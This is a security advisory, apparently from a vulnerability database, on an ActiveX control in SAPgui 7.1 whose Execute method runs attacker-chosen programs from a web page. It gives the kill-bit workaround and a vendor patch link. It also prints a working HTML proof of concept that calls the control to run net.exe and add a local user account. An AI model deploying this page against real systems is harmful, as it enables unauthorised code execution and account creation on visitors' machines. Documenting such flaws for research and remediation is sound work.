Affected version:
SAP SAPgui 7.1
Vulnerability description:
SAPgui is the graphical user interface client for SAP software.
The SAPBExCommonResources ActiveX control installed with SAPgui does not properly validate the parameters passed to its Execute method. If a user is lured into visiting a malicious web page that passes attacker-controlled parameters to this method, arbitrary code execution results. <* Reference
Alexey Sintsov (don_huan@xakep.ru)
http://dsecrg.com/pages/vul/show.php?id=164
*>
Test method:
The program (method) provided on this site may be offensive and is only to be used for security research and teaching. Use it at your own risk!

<html>
<title>* DSecRG * Add user * DSecRG *</title>
<object classid="clsid:A009C90D-814B-11D3-BA3E-080009D22344" id="DH"></object>
<script language="javascript">
function init()
{
    // Passes attacker-chosen program and arguments straight to the control's Execute method.
    DH.Execute("net.exe", "user don_huan p4ssW0rd /add", "d:\\windows\\", 1, "", 1);
}
init();
</script>
DSecRG
</html>

SEBUG security suggestions:
Temporary solution:
* Set the kill bit for CLSID {A009C90D-814B-11D3-BA3E-080009D22344}.
Vendor patch:
SAP
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
https://service.sap.com/sap/support/notes/1407285